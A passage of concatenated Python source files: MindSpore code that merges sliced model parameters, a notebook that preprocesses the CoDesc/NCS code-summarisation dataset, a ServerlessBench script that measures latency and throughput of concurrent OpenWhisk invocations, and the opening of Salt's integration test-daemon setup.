logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
Examples:
>>> strategy_filename = "./strategy_train.ckpt"
>>> strategy = build_searched_strategy(strategy_filename)
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (dict): Parameter slice strategy, the default is None.
If strategy is None, just merge parameter slices in 0 axis order.
- key (str): Parameter name.
- value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> strategy = build_searched_strategy("./strategy_train.ckpt")
>>> sliced_parameters = [
>>> Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
>>> "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
|
Preprocess_NCS.py
|
# %% [markdown]
# # Imports
# %%
import os
import shutil
import time
import datetime
import json
import jsonlines
import pickle
import sys
import gc
import numpy as np
import pandas as pd
import random
import math
# %%
import multiprocessing
NUM_CORES = 6
# %%
ERROR_STRING = "__ERROR__"
# %% [markdown]
# # Output Location
# %%
OUTPUT_FOLDER = "data/ncs_preprocessed_data/"
divs = ["train-CoDesc", "train", "dev", "test"]
for div in divs:
folder = OUTPUT_FOLDER+div+"/"
os.system('mkdir -p $folder')
# %%
AVOID_DICT = {}
SEPARATOR = '<SEP>'
# %% [markdown]
# # Load CoDesc
# %%
CoDesc_FOLDER = "data/CoDesc/"
# %%
in_file = open(CoDesc_FOLDER+"CoDesc.json", 'r')
CoDesc_data = json.load(in_file)
in_file.close()
# %%
in_file = open(CoDesc_FOLDER+"src2id.json", 'r')
src2id_dict = json.load(in_file)
in_file.close()
# %%
# id2src_df = pd.read_csv(CoDesc_FOLDER+"id2src.csv")
# id2src_df
# %%
len(CoDesc_data) # 4211516
# %%
# Remove some fields to optimize memory consumption
for idx in range(len(CoDesc_data)):
CoDesc_data[idx].pop('src')
CoDesc_data[idx].pop('src_div')
CoDesc_data[idx].pop('src_idx')
CoDesc_data[idx].pop('original_code')
CoDesc_data[idx].pop('original_nl')
gc.collect()
# %% [markdown]
# # Tokenizer
# %%
from Tokenizer.CodePreprocess_final import code_filter
from Tokenizer.NLPreprocess_final import nl_filter
# %%
NCS_code_filter_flags = {
"tokenize and remove_comments": "true",
"remove_escape_charaters": "true",
"subtokenize_camel_case": "true",
"subtokenize_snake_case": "true",
"subtokenize_str_int_str": "true",
"replace_string_literal_with": "STRING", # "as in original data"
"replace_int_literal_with": "NUM", # "as in original data"
"replace_float_literal_with": "NUM", # "as in original data"
"replace_bool_literal_with": "BOOL", # "as in original data"
"remove_non_ascii": "true",
"delete_when_total_token_is_less_than": 3,
"maximum_length": 100000
}
with open('code_filter_flag.json', 'w') as outfile:
json.dump(NCS_code_filter_flags, outfile, indent=2)
outfile.close()
NCS_nl_filter_flags = {
"to_lower_case": "true",
"tokenize": "true",
"remove_escape_charaters": "true",
"subtokenize_camel_case": "true",
"subtokenize_snake_case": "true",
"subtokenize_str_int_str": "true",
"remove_parameter_return_throws_info": "true",
"remove_non_ascii": "true",
"remove_comment_tags": "true",
"remove_html_tags": "true",
"remove_@link_@code_@inheritDoc": "true",
"remove_begin_end_user_doc": "true",
"maximum_length": 50000,
"minimum_alphabet_count": 2,
"remove_unwanted_symbol": "true"
}
with open('nl_filter_flag.json', 'w') as outfile:
json.dump(NCS_nl_filter_flags, outfile, indent=2)
outfile.close()
# %% [markdown]
# # Multiprocessing Tokenize CoDesc Codes and Save
# %%
# multiprocessing
def worker_function(worker_data, code_dict):
print("WORKER START : ", worker_data[0]['id'], worker_data[-1]['id'])
for sample in worker_data:
if sample['id'] % 10000 == 0:
print(datetime.datetime.now(), ":", sample['id'])
try:
code_dict[sample['id']] = code_filter(sample['code'], NCS_code_filter_flags).strip()
except:
code_dict[sample['id']] = ERROR_STRING
print("WORKER END : ", worker_data[0]['id'], worker_data[-1]['id'])
# %%
manager = multiprocessing.Manager()
shared_code_dict = manager.dict()
worker_amount = math.floor(len(CoDesc_data)/NUM_CORES)
workers = []
for i in range(NUM_CORES):
low = i*worker_amount
if i == NUM_CORES-1:
high = len(CoDesc_data)
else:
high = low+worker_amount
w = multiprocessing.Process(target=worker_function, args=(CoDesc_data[low:high], shared_code_dict))
workers.append(w)
w.start()
for w in workers:
w.join()
# %%
tokenized_code_dict = shared_code_dict.copy()
del shared_code_dict
gc.collect()
# %%
tokenized_code_dict[100]
# %%
CoDesc_data[100]
# %%
with open("data/ncs_tokenized_code.json", 'w') as outfile:
json.dump(tokenized_code_dict, outfile, indent = 2)
outfile.close()
# %%
del tokenized_code_dict
gc.collect()
# %%
# %% [markdown]
# # Tokenize and Create NCS test, valid, and train sets
# %%
AVOID_DICT = {}
SEPARATOR = '<SEP>'
# %%
divs = ["train", "dev", "test"]
INPUT_FOLDER = "data/original_data/"+"ncs/"
for div in divs:
print(div)
err = 0
empty = 0
success = 0
code_file = open(INPUT_FOLDER+div+"/code.original_subtoken", 'r')
code_lines = code_file.readlines()
code_file.close()
nl_file = open(INPUT_FOLDER+div+"/javadoc.original", 'r')
nl_lines = nl_file.readlines()
nl_file.close()
code_file = open(OUTPUT_FOLDER+div+"/code.original_subtoken", 'w', encoding='ascii')
nl_file = open(OUTPUT_FOLDER+div+"/javadoc.original", 'w', encoding='ascii')
for idx in range(len(nl_lines)):
try:
tokenized_code = code_filter(code_lines[idx], NCS_code_filter_flags).encode('ascii', errors='ignore').decode().strip()
tokenized_nl = nl_filter(nl_lines[idx], NCS_nl_filter_flags).encode('ascii', errors='ignore').decode().strip()
except:
err += 1
continue
if tokenized_code == "" or tokenized_nl == "":
empty += 1
continue
AVOID_DICT[tokenized_code+SEPARATOR+tokenized_nl] = 1
code_file.write(tokenized_code+"\n")
nl_file.write(tokenized_nl+"\n")
success += 1
print("Error :", err)
print("Empty :", empty)
print("Success :", success)
code_file.close()
nl_file.close()
del code_lines
del nl_lines
gc.collect()
# %% [markdown]
# # Load Tokenized Code
# %%
in_file = open("data/ncs_tokenized_code.json", 'r')
tokenized_code_dict = json.load(in_file)
in_file.close()
# %%
for idx in range(len(CoDesc_data)):
CoDesc_data[idx]['code'] = tokenized_code_dict[str(idx)].encode('ascii', errors='ignore').decode().strip()
CoDesc_data[idx]['nl'] = CoDesc_data[idx]['nl'].encode('ascii', errors='ignore').decode().strip()
# %%
del tokenized_code_dict
gc.collect()
# %%
CoDesc_data[100]
# %% [markdown]
# # Initial Selection of IDs for train, valid and test sets
# %%
truncated_ids = src2id_dict['CodeSearchNet-Py2Java']["truncated"]
print(len(truncated_ids))
# %%
avoid_ids = []
avoid_ids.extend(truncated_ids)
print(len(avoid_ids))
avoid_id_dict = {}
for a_id in avoid_ids:
avoid_id_dict[a_id] = 1
# %%
train_ids_pass1 = []
for candidate_id in range(len(CoDesc_data)):
if candidate_id % 1000000 == 0:
print(datetime.datetime.now(), ":", candidate_id)
try:
string = avoid_id_dict[candidate_id]
except KeyError:
train_ids_pass1.append(candidate_id)
print(len(train_ids_pass1))
# %% [markdown]
# # Duplicate Removal
# %%
train_ids_pass2 = []
errors = []
empty = []
for candidate_id in train_ids_pass1:
if candidate_id % 1000000 == 0:
print(datetime.datetime.now(), ":", candidate_id)
check_str = CoDesc_data[candidate_id]['code']+SEPARATOR+CoDesc_data[candidate_id]['nl']
if check_str.startswith(ERROR_STRING) or check_str.endswith(ERROR_STRING):
errors.append(candidate_id)
continue
elif check_str.startswith(SEPARATOR) or check_str.endswith(SEPARATOR):
empty.append(candidate_id)
continue
try:
mystr = AVOID_DICT[check_str]
except KeyError:
AVOID_DICT[check_str] = 1
train_ids_pass2.append(candidate_id)
# %%
print("ERROR PARSING CODE :", len(errors)) # 14163
print("EMPTY NL or Code :", len(empty)) # 0
print("Duplicate :", (len(train_ids_pass1)-len(train_ids_pass2)-len(empty)-len(errors))) # 83105
print("REMAINING TRAIN:", len(train_ids_pass2))
# %%
del AVOID_DICT
del avoid_ids
del avoid_id_dict
gc.collect()
# %%
# %% [markdown]
# # Creating train-CoDesc set
# %%
train_ids = train_ids_pass2
id_dict = {}
id_dict['train'] = train_ids
# %%
div = "train-CoDesc"
print(div)
code_file = open(OUTPUT_FOLDER+div+"/code.original_subtoken", 'w', encoding='ascii')
nl_file = open(OUTPUT_FOLDER+div+"/javadoc.original", 'w', encoding='ascii')
for sample_id in train_ids:
code_file.write(CoDesc_data[sample_id]['code']+"\n")
nl_file.write(CoDesc_data[sample_id]['nl']+"\n")
code_file.close()
nl_file.close()
# %%
with open(OUTPUT_FOLDER+"ncs-CoDesc_train_ids.json", 'w') as outfile:
json.dump(id_dict, outfile)
outfile.close()
# %%
# %% [markdown]
# # Clean Memory
# %%
del CoDesc_data
del src2id_dict
del id_dict
gc.collect()
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "complexjava"
actionName = "complex-java"
params = "--param-file base64_param.json"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils.color
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith('darwin') else False
BSD = True if 'bsd' in sys.platform else False
AIX = True if sys.platform.startswith('aix') else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
class TestDaemonStartFailed(Exception):
'''
Simple exception to signal that a test daemon failed to start
'''
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(self.parser.options.no_colors is False)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(['minion', 'sub_minion'])
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name='salt-smaster',
daemon_id=self.syndic_master_opts['id'],
daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
